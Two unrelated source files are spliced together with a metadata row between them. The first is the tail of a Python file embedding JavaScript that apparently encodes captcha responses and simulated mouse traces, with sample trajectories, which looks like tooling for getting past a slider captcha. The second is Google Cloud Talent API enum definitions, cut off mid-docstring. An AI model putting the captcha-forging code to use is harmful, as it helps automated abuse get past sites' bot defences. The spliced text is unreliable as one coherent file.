for (var a, b = "6_11_7_10_4_12_3_1_0_5_2_9_8".split("_"), c = [], d = 0, e = 52; d < e; d++)
a = 2 * parseInt(b[parseInt(d % 26 / 2)]) + d % 2,
parseInt(d / 2) % 2 || (a += d % 2 ? -1 : 1),
a += d < 26 ? 26 : 0,
c.push(a);
return c
}
'''
USERRESPONSE_JS = '''
function userresponse(a, b) {
for (var c = b.slice(32), d = [], e = 0; e < c.length; e++) {
var f = c.charCodeAt(e);
d[e] = f > 57 ? f - 87 : f - 48
}
c = 36 * d[0] + d[1];
var g = Math.round(a) + c; b = b.slice(0, 32);
var h, i = [ [], [], [], [], [] ], j = {}, k = 0; e = 0;
for (var l = b.length; e < l; e++)
h = b.charAt(e), j[h] || (j[h] = 1, i[k].push(h), k++, k = 5 == k ? 0 : k);
for (var m, n = g, o = 4, p = "", q = [1, 2, 5, 10, 50]; n > 0;)
n - q[o] >= 0 ? (m = parseInt(Math.random() * i[o].length, 10), p += i[o][m], n -= q[o]) : (i.splice(o, 1), q.splice(o, 1), o -= 1);
return p
}
'''
OFFLINE_SAMPLE = ((186, 1, 98),
(82, 0, 136),
(61, 5, 108),
(128, 2, 7),
(130, 4, 99),
(189, 3, 65),
(108, 5, 285),
(136, 0, 36),
(41, 0, 263),
(124, 3, 185))
TRACE_JS = '''
var tracer = function () {
c = function (traceArray) {
for (var b, c, d, e = [], f = 0, g = [], h = 0, i = traceArray.length - 1; h < i; h++) {
b = Math.round(traceArray[h + 1][0] - traceArray[h][0]),
c = Math.round(traceArray[h + 1][1] - traceArray[h][1]),
d = Math.round(traceArray[h + 1][2] - traceArray[h][2]),
g.push([b, c, d]), 0 == b && 0 == c && 0 == d || (0 == b && 0 == c ? f += d : (e.push([b, c, d + f]), f = 0));
}
return 0 !== f && e.push([b, c, f]), e
},
d = function (a) {
var b = "()*,-./0123456789:?@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqr",
c = b.length,
d = "",
e = Math.abs(a),
f = parseInt(e / c);
f >= c && (f = c - 1), f && (d = b.charAt(f)), e %= c;
var g = "";
return a < 0 && (g += "!"), d && (g += "$"), g + d + b.charAt(e)
},
e = function (a) {
for (var b = [
[1, 0],
[2, 0],
[1, -1],
[1, 1],
[0, 1],
[0, -1],
[3, 0],
[2, -1],
[2, 1]
], c = "stuvwxyz~", d = 0, e = b.length; d < e; d++)
if (a[0] == b[d][0] && a[1] == b[d][1]) return c[d];
return 0
},
f = function (traceArray) {
for (var b, f = c(traceArray), g = [], h = [], i = [], j = 0, k = f.length; j < k; j++) {
b = e(f[j]), b ? h.push(b) : (g.push(d(f[j][0])), h.push(d(f[j][1]))), i.push(d(f[j][2]));
}
return g.join("") + "!!" + h.join("") + "!!" + i.join("")
},
g = function (traceArray) {
var a = f(traceArray);
return encodeURIComponent(a)
};
return {
trace: g
}
}();
exports.tracer = tracer;
'''
def has_key(database, key):
'''安全的检查leveldb是否存在key'''
try:
database.Get(key)
return True
except KeyError:
return False
| mit | -119,942,036,943,591,280 | 31.669811 | 144 | 0.35332 | false |
tseaver/google-cloud-python | talent/google/cloud/talent_v4beta1/gapic/enums.py | 1 | 48648 | # -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for protocol buffer enum types."""
import enum
class AvailabilitySignalType(enum.IntEnum):
"""
The type of candidate availability signal.
Attributes:
AVAILABILITY_SIGNAL_TYPE_UNSPECIFIED (int): Default value.
JOB_APPLICATION (int): Job application signal.
In the context of ``Profile.availability_signals``, this signal is
related to the candidate's most recent application. ``last_update_time``
is calculated from max(\ ``Application.create_time``) from all
``Application`` records where ``Application.source`` is any of the
following: ``APPLY_DIRECT_WEB`` ``APPLY_DIRECT_MOBILE_WEB``
``APPLY_DIRECT_MOBILE_APP`` ``APPLY_DIRECT_IN_PERSON``
``APPLY_INDIRECT``
In the context of ``AvailabilityFilter``, the filter is applied on
``Profile.availability_signals`` where ``type`` is JOB\_APPLICATION.
RESUME_UPDATE (int): Resume update signal.
In the context of ``Profile.availability_signals``, this signal is
related to the candidate's most recent update to their resume. For a
``SummarizedProfile.summary``, ``last_update_time`` is calculated from
max(\ ``Profile.resume_update_time``) from all
``SummarizedProfile.profiles``.
In the context of ``AvailabilityFilter``, the filter is applied on
``Profile.availability_signals`` where ``type`` is RESUME\_UPDATE.
CANDIDATE_UPDATE (int): Candidate update signal.
In the context of ``Profile.availability_signals``, this signal is
related to the candidate's most recent update to their profile. For a
``SummarizedProfile.summary``, ``last_update_time`` is calculated from
max(\ ``Profile.candidate_update_time``) from all
``SummarizedProfile.profiles``.
In the context of ``AvailabilityFilter``, the filter is applied on
``Profile.availability_signals`` where ``type`` is CANDIDATE\_UPDATE.
CLIENT_SUBMISSION (int): Client submission signal.
In the context of ``Profile.availability_signals``, this signal is
related to the candidate's most recent submission. ``last_update_time``
is calculated from max(\ ``Application.create_time``) from all
``Application`` records where ``Application.stage`` is any of the
following: ``HIRING_MANAGER_REVIEW`` ``INTERVIEW`` ``OFFER_EXTENDED``
``OFFER_ACCEPTED`` ``STARTED``
In the context of ``AvailabilityFilter``, the filter is applied on
``Profile.availability_signals`` where ``type`` is CLIENT\_SUBMISSION.
"""
AVAILABILITY_SIGNAL_TYPE_UNSPECIFIED = 0
JOB_APPLICATION = 1
RESUME_UPDATE = 2
CANDIDATE_UPDATE = 3
CLIENT_SUBMISSION = 4
class CommuteMethod(enum.IntEnum):
"""
Method for commute.
Attributes:
COMMUTE_METHOD_UNSPECIFIED (int): Commute method isn't specified.
DRIVING (int): Commute time is calculated based on driving time.
TRANSIT (int): Commute time is calculated based on public transit including bus, metro,
subway, and so on.
WALKING (int): Commute time is calculated based on walking time.
CYCLING (int): Commute time is calculated based on biking time.
"""
COMMUTE_METHOD_UNSPECIFIED = 0
DRIVING = 1
TRANSIT = 2
WALKING = 3
CYCLING = 4
class CompanySize(enum.IntEnum):
"""
An enum that represents the size of the company.
Attributes:
COMPANY_SIZE_UNSPECIFIED (int): Default value if the size isn't specified.
MINI (int): The company has less than 50 employees.
SMALL (int): The company has between 50 and 99 employees.
SMEDIUM (int): The company has between 100 and 499 employees.
MEDIUM (int): The company has between 500 and 999 employees.
BIG (int): The company has between 1,000 and 4,999 employees.
BIGGER (int): The company has between 5,000 and 9,999 employees.
GIANT (int): The company has 10,000 or more employees.
"""
COMPANY_SIZE_UNSPECIFIED = 0
MINI = 1
SMALL = 2
SMEDIUM = 3
MEDIUM = 4
BIG = 5
BIGGER = 6
GIANT = 7
class ContactInfoUsage(enum.IntEnum):
"""
Enum that represents the usage of the contact information.
Attributes:
CONTACT_INFO_USAGE_UNSPECIFIED (int): Default value.
PERSONAL (int): Personal use.
WORK (int): Work use.
SCHOOL (int): School use.
"""
CONTACT_INFO_USAGE_UNSPECIFIED = 0
PERSONAL = 1
WORK = 2
SCHOOL = 3
class DegreeType(enum.IntEnum):
"""
Educational degree level defined in International Standard Classification
of Education (ISCED).
Attributes:
DEGREE_TYPE_UNSPECIFIED (int): Default value. Represents no degree, or early childhood education.
Maps to ISCED code 0.
Ex) Kindergarten
PRIMARY_EDUCATION (int): Primary education which is typically the first stage of compulsory
education. ISCED code 1.
Ex) Elementary school
LOWER_SECONDARY_EDUCATION (int): Lower secondary education; First stage of secondary education building on
primary education, typically with a more subject-oriented curriculum.
ISCED code 2.
Ex) Middle school
UPPER_SECONDARY_EDUCATION (int): Middle education; Second/final stage of secondary education preparing for
tertiary education and/or providing skills relevant to employment.
Usually with an increased range of subject options and streams. ISCED
code 3.
Ex) High school
ADULT_REMEDIAL_EDUCATION (int): Adult Remedial Education; Programmes providing learning experiences that
build on secondary education and prepare for labour market entry and/or
tertiary education. The content is broader than secondary but not as
complex as tertiary education. ISCED code 4.
ASSOCIATES_OR_EQUIVALENT (int): Associate's or equivalent; Short first tertiary programmes that are
typically practically-based, occupationally-specific and prepare for
labour market entry. These programmes may also provide a pathway to other
tertiary programmes. ISCED code 5.
BACHELORS_OR_EQUIVALENT (int): Bachelor's or equivalent; Programmes designed to provide intermediate
academic and/or professional knowledge, skills and competencies leading
to a first tertiary degree or equivalent qualification. ISCED code 6.
MASTERS_OR_EQUIVALENT (int): Master's or equivalent; Programmes designed to provide advanced academic
and/or professional knowledge, skills and competencies leading to a
second tertiary degree or equivalent qualification. ISCED code 7.
DOCTORAL_OR_EQUIVALENT (int): Doctoral or equivalent; Programmes designed primarily to lead to an
advanced research qualification, usually concluding with the submission
and defense of a substantive dissertation of publishable quality based on
original research. ISCED code 8.
"""
DEGREE_TYPE_UNSPECIFIED = 0
PRIMARY_EDUCATION = 1
LOWER_SECONDARY_EDUCATION = 2
UPPER_SECONDARY_EDUCATION = 3
ADULT_REMEDIAL_EDUCATION = 4
ASSOCIATES_OR_EQUIVALENT = 5
BACHELORS_OR_EQUIVALENT = 6
MASTERS_OR_EQUIVALENT = 7
DOCTORAL_OR_EQUIVALENT = 8
class EmploymentType(enum.IntEnum):
"""
An enum that represents the employment type of a job.
Attributes:
EMPLOYMENT_TYPE_UNSPECIFIED (int): The default value if the employment type isn't specified.
FULL_TIME (int): The job requires working a number of hours that constitute full
time employment, typically 40 or more hours per week.
PART_TIME (int): The job entails working fewer hours than a full time job,
typically less than 40 hours a week.
CONTRACTOR (int): The job is offered as a contracted, as opposed to a salaried employee,
position.
CONTRACT_TO_HIRE (int): The job is offered as a contracted position with the understanding that
it's converted into a full-time position at the end of the contract.
Jobs of this type are also returned by a search for
``EmploymentType.CONTRACTOR`` jobs.
TEMPORARY (int): The job is offered as a temporary employment opportunity, usually
a short-term engagement.
INTERN (int): The job is a fixed-term opportunity for students or entry-level job
seekers to obtain on-the-job training, typically offered as a summer
position.
VOLUNTEER (int): The is an opportunity for an individual to volunteer, where there's no
expectation of compensation for the provided services.
PER_DIEM (int): The job requires an employee to work on an as-needed basis with a
flexible schedule.
FLY_IN_FLY_OUT (int): The job involves employing people in remote areas and flying them
temporarily to the work site instead of relocating employees and their
families permanently.
OTHER_EMPLOYMENT_TYPE (int): The job does not fit any of the other listed types.
"""
EMPLOYMENT_TYPE_UNSPECIFIED = 0
FULL_TIME = 1
PART_TIME = 2
CONTRACTOR = 3
CONTRACT_TO_HIRE = 4
TEMPORARY = 5
INTERN = 6
VOLUNTEER = 7
PER_DIEM = 8
FLY_IN_FLY_OUT = 9
OTHER_EMPLOYMENT_TYPE = 10
class HtmlSanitization(enum.IntEnum):
"""
Option for HTML content sanitization on user input fields, for example, job
description. By setting this option, user can determine whether and how
sanitization is performed on these fields.
Attributes:
HTML_SANITIZATION_UNSPECIFIED (int): Default value.
HTML_SANITIZATION_DISABLED (int): Disables sanitization on HTML input.
SIMPLE_FORMATTING_ONLY (int): Sanitizes HTML input, only accepts bold, italic, ordered list, and
unordered list markup tags.
"""
HTML_SANITIZATION_UNSPECIFIED = 0
HTML_SANITIZATION_DISABLED = 1
SIMPLE_FORMATTING_ONLY = 2
class JobBenefit(enum.IntEnum):
"""
An enum that represents employee benefits included with the job.
Attributes:
JOB_BENEFIT_UNSPECIFIED (int): Default value if the type isn't specified.
CHILD_CARE (int): The job includes access to programs that support child care, such
as daycare.
DENTAL (int): The job includes dental services covered by a dental
insurance plan.
DOMESTIC_PARTNER (int): The job offers specific benefits to domestic partners.
FLEXIBLE_HOURS (int): The job allows for a flexible work schedule.
MEDICAL (int): The job includes health services covered by a medical insurance plan.
LIFE_INSURANCE (int): The job includes a life insurance plan provided by the employer or
available for purchase by the employee.
PARENTAL_LEAVE (int): The job allows for a leave of absence to a parent to care for a newborn
child.
RETIREMENT_PLAN (int): The job includes a workplace retirement plan provided by the
employer or available for purchase by the employee.
SICK_DAYS (int): The job allows for paid time off due to illness.
VACATION (int): The job includes paid time off for vacation.
VISION (int): The job includes vision services covered by a vision
insurance plan.
"""
JOB_BENEFIT_UNSPECIFIED = 0
CHILD_CARE = 1
DENTAL = 2
DOMESTIC_PARTNER = 3
FLEXIBLE_HOURS = 4
MEDICAL = 5
LIFE_INSURANCE = 6
PARENTAL_LEAVE = 7
RETIREMENT_PLAN = 8
SICK_DAYS = 9
VACATION = 10
VISION = 11
class JobCategory(enum.IntEnum):
"""
An enum that represents the categorization or primary focus of specific
role. This value is different than the "industry" associated with a role,
which is related to the categorization of the company listing the job.
Attributes:
JOB_CATEGORY_UNSPECIFIED (int): The default value if the category isn't specified.
ACCOUNTING_AND_FINANCE (int): An accounting and finance job, such as an Accountant.
ADMINISTRATIVE_AND_OFFICE (int): An administrative and office job, such as an Administrative Assistant.
ADVERTISING_AND_MARKETING (int): An advertising and marketing job, such as Marketing Manager.
ANIMAL_CARE (int): An animal care job, such as Veterinarian.
ART_FASHION_AND_DESIGN (int): An art, fashion, or design job, such as Designer.
BUSINESS_OPERATIONS (int): A business operations job, such as Business Operations Manager.
CLEANING_AND_FACILITIES (int): A cleaning and facilities job, such as Custodial Staff.
COMPUTER_AND_IT (int): A computer and IT job, such as Systems Administrator.
CONSTRUCTION (int): A construction job, such as General Laborer.
CUSTOMER_SERVICE (int): A customer service job, such s Cashier.
EDUCATION (int): An education job, such as School Teacher.
ENTERTAINMENT_AND_TRAVEL (int): An entertainment and travel job, such as Flight Attendant.
FARMING_AND_OUTDOORS (int): A farming or outdoor job, such as Park Ranger.
HEALTHCARE (int): A healthcare job, such as Registered Nurse.
HUMAN_RESOURCES (int): A human resources job, such as Human Resources Director.
INSTALLATION_MAINTENANCE_AND_REPAIR (int): An installation, maintenance, or repair job, such as Electrician.
LEGAL (int): A legal job, such as Law Clerk.
MANAGEMENT (int): A management job, often used in conjunction with another category,
such as Store Manager.
MANUFACTURING_AND_WAREHOUSE (int): A manufacturing or warehouse job, such as Assembly Technician.
MEDIA_COMMUNICATIONS_AND_WRITING (int): A media, communications, or writing job, such as Media Relations.
OIL_GAS_AND_MINING (int): An oil, gas or mining job, such as Offshore Driller.
PERSONAL_CARE_AND_SERVICES (int): A personal care and services job, such as Hair Stylist.
PROTECTIVE_SERVICES (int): A protective services job, such as Security Guard.
REAL_ESTATE (int): A real estate job, such as Buyer's Agent.
RESTAURANT_AND_HOSPITALITY (int): A restaurant and hospitality job, such as Restaurant Server.
SALES_AND_RETAIL (int): A sales and/or retail job, such Sales Associate.
SCIENCE_AND_ENGINEERING (int): A science and engineering job, such as Lab Technician.
SOCIAL_SERVICES_AND_NON_PROFIT (int): A social services or non-profit job, such as Case Worker.
SPORTS_FITNESS_AND_RECREATION (int): A sports, fitness, or recreation job, such as Personal Trainer.
TRANSPORTATION_AND_LOGISTICS (int): A transportation or logistics job, such as Truck Driver.
"""
JOB_CATEGORY_UNSPECIFIED = 0
ACCOUNTING_AND_FINANCE = 1
ADMINISTRATIVE_AND_OFFICE = 2
ADVERTISING_AND_MARKETING = 3
ANIMAL_CARE = 4
ART_FASHION_AND_DESIGN = 5
BUSINESS_OPERATIONS = 6
CLEANING_AND_FACILITIES = 7
COMPUTER_AND_IT = 8
CONSTRUCTION = 9
CUSTOMER_SERVICE = 10
EDUCATION = 11
ENTERTAINMENT_AND_TRAVEL = 12
FARMING_AND_OUTDOORS = 13
HEALTHCARE = 14
HUMAN_RESOURCES = 15
INSTALLATION_MAINTENANCE_AND_REPAIR = 16
LEGAL = 17
MANAGEMENT = 18
MANUFACTURING_AND_WAREHOUSE = 19
MEDIA_COMMUNICATIONS_AND_WRITING = 20
OIL_GAS_AND_MINING = 21
PERSONAL_CARE_AND_SERVICES = 22
PROTECTIVE_SERVICES = 23
REAL_ESTATE = 24
RESTAURANT_AND_HOSPITALITY = 25
SALES_AND_RETAIL = 26
SCIENCE_AND_ENGINEERING = 27
SOCIAL_SERVICES_AND_NON_PROFIT = 28
SPORTS_FITNESS_AND_RECREATION = 29
TRANSPORTATION_AND_LOGISTICS = 30
class JobLevel(enum.IntEnum):
"""
An enum that represents the required experience level required for the job.
Attributes:
JOB_LEVEL_UNSPECIFIED (int): The default value if the level isn't specified.
ENTRY_LEVEL (int): Entry-level individual contributors, typically with less than 2 years of
experience in a similar role. Includes interns.
EXPERIENCED (int): Experienced individual contributors, typically with 2+ years of
experience in a similar role.
MANAGER (int): Entry- to mid-level managers responsible for managing a team of people.
DIRECTOR (int): Senior-level managers responsible for managing teams of managers.
EXECUTIVE (int): Executive-level managers and above, including C-level positions.
"""
JOB_LEVEL_UNSPECIFIED = 0
ENTRY_LEVEL = 1
EXPERIENCED = 2
MANAGER = 3
DIRECTOR = 4
EXECUTIVE = 5
class JobView(enum.IntEnum):
"""
An enum that specifies the job attributes that are returned in the
``MatchingJob.job`` or ``ListJobsResponse.jobs`` fields.
Attributes:
JOB_VIEW_UNSPECIFIED (int): Default value.
JOB_VIEW_ID_ONLY (int): A ID only view of job, with following attributes: ``Job.name``,
``Job.requisition_id``, ``Job.language_code``.
JOB_VIEW_MINIMAL (int): A minimal view of the job, with the following attributes: ``Job.name``,
``Job.requisition_id``, ``Job.title``, ``Job.company``,
``Job.DerivedInfo.locations``, ``Job.language_code``.
JOB_VIEW_SMALL (int): A small view of the job, with the following attributes in the search
results: ``Job.name``, ``Job.requisition_id``, ``Job.title``,
``Job.company``, ``Job.DerivedInfo.locations``, ``Job.visibility``,
``Job.language_code``, ``Job.description``.
JOB_VIEW_FULL (int): All available attributes are included in the search results.
"""
JOB_VIEW_UNSPECIFIED = 0
JOB_VIEW_ID_ONLY = 1
JOB_VIEW_MINIMAL = 2
JOB_VIEW_SMALL = 3
JOB_VIEW_FULL = 4
class Outcome(enum.IntEnum):
"""
The overall outcome /decision / result indicator.
Attributes:
OUTCOME_UNSPECIFIED (int): Default value.
POSITIVE (int): A positive outcome / passing indicator (for example, candidate was
recommended for hiring or to be moved forward in the hiring process,
candidate passed a test).
NEUTRAL (int): A neutral outcome / no clear indicator (for example, no strong
reccommendation either to move forward / not move forward, neutral score).
NEGATIVE (int): A negative outcome / failing indicator (for example, candidate was
recommended to NOT move forward in the hiring process, failed a test).
OUTCOME_NOT_AVAILABLE (int): The assessment outcome is not available or otherwise unknown (for example,
candidate did not complete assessment).
"""
OUTCOME_UNSPECIFIED = 0
POSITIVE = 1
NEUTRAL = 2
NEGATIVE = 3
OUTCOME_NOT_AVAILABLE = 4
class PostingRegion(enum.IntEnum):
"""
An enum that represents the job posting region. In most cases, job postings
don't need to specify a region. If a region is given, jobs are
eligible for searches in the specified region.
Attributes:
POSTING_REGION_UNSPECIFIED (int): If the region is unspecified, the job is only returned if it matches the
``LocationFilter``.
ADMINISTRATIVE_AREA (int): In addition to exact location matching, job posting is returned when the
``LocationFilter`` in the search query is in the same administrative
area as the returned job posting. For example, if a
``ADMINISTRATIVE_AREA`` job is posted in "CA, USA", it's returned if
``LocationFilter`` has "Mountain View".
Administrative area refers to top-level administrative subdivision of
this country. For example, US state, IT region, UK constituent nation
and JP prefecture.
NATION (int): In addition to exact location matching, job is returned when
``LocationFilter`` in search query is in the same country as this job.
For example, if a ``NATION_WIDE`` job is posted in "USA", it's returned
if ``LocationFilter`` has 'Mountain View'.
TELECOMMUTE (int): Job allows employees to work remotely (telecommute).
If locations are provided with this value, the job is
considered as having a location, but telecommuting is allowed.
"""
POSTING_REGION_UNSPECIFIED = 0
ADMINISTRATIVE_AREA = 1
NATION = 2
TELECOMMUTE = 3
class SkillProficiencyLevel(enum.IntEnum):
"""
Enum that represents the skill proficiency level.
Attributes:
SKILL_PROFICIENCY_LEVEL_UNSPECIFIED (int): Default value.
UNSKILLED (int): Lacks any proficiency in this skill.
FUNDAMENTAL_AWARENESS (int): Have a common knowledge or an understanding of basic techniques and
concepts.
NOVICE (int): Have the level of experience gained in a classroom and/or experimental
scenarios or as a trainee on-the-job.
INTERMEDIATE (int): Be able to successfully complete tasks in this skill as requested. Help
from an expert may be required from time to time, but can usually perform
skill independently.
ADVANCED (int): Can perform the actions associated with this skill without assistance.
EXPERT (int): Known as an expert in this area.
"""
SKILL_PROFICIENCY_LEVEL_UNSPECIFIED = 0
UNSKILLED = 6
FUNDAMENTAL_AWARENESS = 1
NOVICE = 2
INTERMEDIATE = 3
ADVANCED = 4
EXPERT = 5
class Visibility(enum.IntEnum):
"""
Deprecated. All resources are only visible to the owner.
An enum that represents who has view access to the resource.
Attributes:
VISIBILITY_UNSPECIFIED (int): Default value.
ACCOUNT_ONLY (int): The resource is only visible to the GCP account who owns it.
SHARED_WITH_GOOGLE (int): The resource is visible to the owner and may be visible to other
applications and processes at Google.
SHARED_WITH_PUBLIC (int): The resource is visible to the owner and may be visible to all other API
clients.
"""
VISIBILITY_UNSPECIFIED = 0
ACCOUNT_ONLY = 1
SHARED_WITH_GOOGLE = 2
SHARED_WITH_PUBLIC = 3
class Application(object):
class ApplicationStage(enum.IntEnum):
"""
The stage of the application.
Attributes:
APPLICATION_STAGE_UNSPECIFIED (int): Default value.
NEW (int): Candidate has applied or a recruiter put candidate into consideration but
candidate is not yet screened / no decision has been made to move or not
move the candidate to the next stage.
SCREEN (int): A recruiter decided to screen the candidate for this role.
HIRING_MANAGER_REVIEW (int): Candidate is being / was sent to the customer / hiring manager for
detailed review.
INTERVIEW (int): Candidate was approved by the client / hiring manager and is being / was
interviewed for the role.
OFFER_EXTENDED (int): Candidate will be / has been given an offer of employment.
OFFER_ACCEPTED (int): Candidate has accepted their offer of employment.
STARTED (int): Candidate has begun (or completed) their employment or assignment with
the employer.
"""
APPLICATION_STAGE_UNSPECIFIED = 0
NEW = 1
SCREEN = 2
HIRING_MANAGER_REVIEW = 3
INTERVIEW = 4
OFFER_EXTENDED = 5
OFFER_ACCEPTED = 6
STARTED = 7
class ApplicationState(enum.IntEnum):
"""
Enum that represents the application status.
Attributes:
APPLICATION_STATE_UNSPECIFIED (int): Default value.
IN_PROGRESS (int): The current stage is in progress or pending, for example, interviews in
progress.
CANDIDATE_WITHDREW (int): The current stage was terminated by a candidate decision.
EMPLOYER_WITHDREW (int): The current stage was terminated by an employer or agency decision.
COMPLETED (int): The current stage is successfully completed, but the next stage (if
applicable) has not begun.
CLOSED (int): The current stage was closed without an exception, or terminated for
reasons unrealated to the candidate.
"""
APPLICATION_STATE_UNSPECIFIED = 0
IN_PROGRESS = 1
CANDIDATE_WITHDREW = 2
EMPLOYER_WITHDREW = 3
COMPLETED = 4
CLOSED = 5
class BatchOperationMetadata(object):
class State(enum.IntEnum):
"""
Attributes:
STATE_UNSPECIFIED (int): Default value.
INITIALIZING (int): The batch operation is being prepared for processing.
PROCESSING (int): The batch operation is actively being processed.
SUCCEEDED (int): The batch operation is processed, and at least one item has been
successfully processed.
FAILED (int): The batch operation is done and no item has been successfully processed.
CANCELLING (int): The batch operation is in the process of cancelling after
``google.longrunning.Operations.CancelOperation`` is called.
CANCELLED (int): The batch operation is done after
``google.longrunning.Operations.CancelOperation`` is called. Any items
processed before cancelling are returned in the response.
"""
STATE_UNSPECIFIED = 0
INITIALIZING = 1
PROCESSING = 2
SUCCEEDED = 3
FAILED = 4
CANCELLING = 5
CANCELLED = 6
class CommuteFilter(object):
class RoadTraffic(enum.IntEnum):
"""
The traffic density to use when calculating commute time.
Attributes:
ROAD_TRAFFIC_UNSPECIFIED (int): Road traffic situation isn't specified.
TRAFFIC_FREE (int): Optimal commute time without considering any traffic impact.
BUSY_HOUR (int): Commute time calculation takes in account the peak traffic impact.
"""
ROAD_TRAFFIC_UNSPECIFIED = 0
TRAFFIC_FREE = 1
BUSY_HOUR = 2
class CompensationFilter(object):
class FilterType(enum.IntEnum):
"""
Specify the type of filtering.
Attributes:
FILTER_TYPE_UNSPECIFIED (int): Filter type unspecified. Position holder, INVALID, should never be used.
UNIT_ONLY (int): Filter by ``base compensation entry's`` unit. A job is a match if and
only if the job contains a base CompensationEntry and the base
CompensationEntry's unit matches provided ``units``. Populate one or
more ``units``.
See ``CompensationInfo.CompensationEntry`` for definition of base
compensation entry.
UNIT_AND_AMOUNT (int): Filter by ``base compensation entry's`` unit and amount / range. A job
is a match if and only if the job contains a base CompensationEntry, and
the base entry's unit matches provided ``CompensationUnit`` and amount
or range overlaps with provided ``CompensationRange``.
See ``CompensationInfo.CompensationEntry`` for definition of base
compensation entry.
Set exactly one ``units`` and populate ``range``.
ANNUALIZED_BASE_AMOUNT (int): Filter by annualized base compensation amount and
``base compensation entry's`` unit. Populate ``range`` and zero or more
``units``.
ANNUALIZED_TOTAL_AMOUNT (int): Filter by annualized total compensation amount and
``base compensation entry's`` unit . Populate ``range`` and zero or more
``units``.
"""
FILTER_TYPE_UNSPECIFIED = 0
UNIT_ONLY = 1
UNIT_AND_AMOUNT = 2
ANNUALIZED_BASE_AMOUNT = 3
ANNUALIZED_TOTAL_AMOUNT = 4
class CompensationInfo(object):
class CompensationType(enum.IntEnum):
"""
The type of compensation.
For compensation amounts specified in non-monetary amounts, describe the
compensation scheme in the ``CompensationEntry.description``.
For example, tipping format is described in
``CompensationEntry.description`` (for example, "expect 15-20% tips
based on customer bill.") and an estimate of the tips provided in
``CompensationEntry.amount`` or ``CompensationEntry.range`` ($10 per
hour).
For example, equity is described in ``CompensationEntry.description``
(for example, "1% - 2% equity vesting over 4 years, 1 year cliff") and
value estimated in ``CompensationEntry.amount`` or
``CompensationEntry.range``. If no value estimate is possible, units are
``CompensationUnit.COMPENSATION_UNIT_UNSPECIFIED`` and then further
clarified in ``CompensationEntry.description`` field.
Attributes:
COMPENSATION_TYPE_UNSPECIFIED (int): Default value.
BASE (int): Base compensation: Refers to the fixed amount of money paid to an
employee by an employer in return for work performed. Base compensation
does not include benefits, bonuses or any other potential compensation
from an employer.
BONUS (int): Bonus.
SIGNING_BONUS (int): Signing bonus.
EQUITY (int): Equity.
PROFIT_SHARING (int): Profit sharing.
COMMISSIONS (int): Commission.
TIPS (int): Tips.
OTHER_COMPENSATION_TYPE (int): Other compensation type.
"""
COMPENSATION_TYPE_UNSPECIFIED = 0
BASE = 1
BONUS = 2
SIGNING_BONUS = 3
EQUITY = 4
PROFIT_SHARING = 5
COMMISSIONS = 6
TIPS = 7
OTHER_COMPENSATION_TYPE = 8
class CompensationUnit(enum.IntEnum):
"""
Pay frequency.
Attributes:
COMPENSATION_UNIT_UNSPECIFIED (int): Default value.
HOURLY (int): Hourly.
DAILY (int): Daily.
WEEKLY (int): Weekly
MONTHLY (int): Monthly.
YEARLY (int): Yearly.
ONE_TIME (int): One time.
OTHER_COMPENSATION_UNIT (int): Other compensation units.
"""
COMPENSATION_UNIT_UNSPECIFIED = 0
HOURLY = 1
DAILY = 2
WEEKLY = 3
MONTHLY = 4
YEARLY = 5
ONE_TIME = 6
OTHER_COMPENSATION_UNIT = 7
class CompleteQueryRequest(object):
class CompletionScope(enum.IntEnum):
"""
Enum to specify the scope of completion.
Attributes:
COMPLETION_SCOPE_UNSPECIFIED (int): Default value.
TENANT (int): Suggestions are based only on the data provided by the client.
PUBLIC (int): Suggestions are based on all jobs data in the system that's visible to
the client
"""
COMPLETION_SCOPE_UNSPECIFIED = 0
TENANT = 1
PUBLIC = 2
class CompletionType(enum.IntEnum):
"""
Enum to specify auto-completion topics.
Attributes:
COMPLETION_TYPE_UNSPECIFIED (int): Default value.
JOB_TITLE (int): Only suggest job titles.
COMPANY_NAME (int): Only suggest company names.
COMBINED (int): Suggest both job titles and company names.
"""
COMPLETION_TYPE_UNSPECIFIED = 0
JOB_TITLE = 1
COMPANY_NAME = 2
COMBINED = 3
class DeviceInfo(object):
class DeviceType(enum.IntEnum):
"""
An enumeration describing an API access portal and exposure mechanism.
Attributes:
DEVICE_TYPE_UNSPECIFIED (int): The device type isn't specified.
WEB (int): A desktop web browser, such as, Chrome, Firefox, Safari, or Internet
Explorer)
MOBILE_WEB (int): A mobile device web browser, such as a phone or tablet with a Chrome
browser.
ANDROID (int): An Android device native application.
IOS (int): An iOS device native application.
BOT (int): A bot, as opposed to a device operated by human beings, such as a web
crawler.
OTHER (int): Other devices types.
"""
DEVICE_TYPE_UNSPECIFIED = 0
WEB = 1
MOBILE_WEB = 2
ANDROID = 3
IOS = 4
BOT = 5
OTHER = 6
class EmployerFilter(object):
class EmployerFilterMode(enum.IntEnum):
"""
Enum indicating which set of ``Profile.employment_records`` to search
against.
Attributes:
EMPLOYER_FILTER_MODE_UNSPECIFIED (int): Default value.
ALL_EMPLOYMENT_RECORDS (int): Apply to all employers in ``Profile.employment_records``.
CURRENT_EMPLOYMENT_RECORDS_ONLY (int): Apply only to current employer in ``Profile.employment_records``.
PAST_EMPLOYMENT_RECORDS_ONLY (int): Apply only to past (not current) employers in
``Profile.employment_records``.
"""
EMPLOYER_FILTER_MODE_UNSPECIFIED = 0
ALL_EMPLOYMENT_RECORDS = 1
CURRENT_EMPLOYMENT_RECORDS_ONLY = 2
PAST_EMPLOYMENT_RECORDS_ONLY = 3
class JobEvent(object):
class JobEventType(enum.IntEnum):
"""
An enumeration of an event attributed to the behavior of the end user,
such as a job seeker.
Attributes:
JOB_EVENT_TYPE_UNSPECIFIED (int): The event is unspecified by other provided values.
IMPRESSION (int): The job seeker or other entity interacting with the service has
had a job rendered in their view, such as in a list of search results in
a compressed or clipped format. This event is typically associated with
the viewing of a jobs list on a single page by a job seeker.
VIEW (int): The job seeker, or other entity interacting with the service, has viewed
the details of a job, including the full description. This event doesn't
apply to the viewing a snippet of a job appearing as a part of the job
search results. Viewing a snippet is associated with an ``impression``).
VIEW_REDIRECT (int): The job seeker or other entity interacting with the service
performed an action to view a job and was redirected to a different
